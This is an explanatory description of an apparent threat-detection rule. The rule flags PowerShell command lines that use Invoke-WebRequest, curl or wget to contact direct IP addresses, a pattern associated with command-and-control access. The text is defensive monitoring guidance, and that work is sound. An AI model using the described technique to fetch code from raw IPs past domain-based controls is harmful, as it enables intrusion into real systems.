This rule is designed to detect potentially suspicious executions of PowerShell commands that utilize the Invoke-WebRequest cmdlet to access resources via direct IP addresses instead of domain names. The underlying rationale is that attackers often bypass domain-based security measures by accessing compromised systems or command-and-control servers directly through numerical IP addresses. The rule looks for instances where PowerShell or PowerShell Core (pwsh) is called with specific command-line parameters that include Invoke-WebRequest or similar commands like curl and wget, along with the inclusion of direct IP patterns in the command line. This behavior is indexed under the 'process_creation' log source for the Windows platform, leveraging the operational details provided by the process lifecycle to enhance threat detection capabilities. Given the nature of these commands, false positives may arise primarily from legitimate use cases that leverage PowerShell for communication with web services using direct IP addresses, thus necessitating an analytical review of flagged events. The rule holds a medium severity level, indicating a noteworthy risk that requires attention despite being less common than other attack vectors, and encompasses best practices for ongoing monitoring of PowerShell activity in the environment.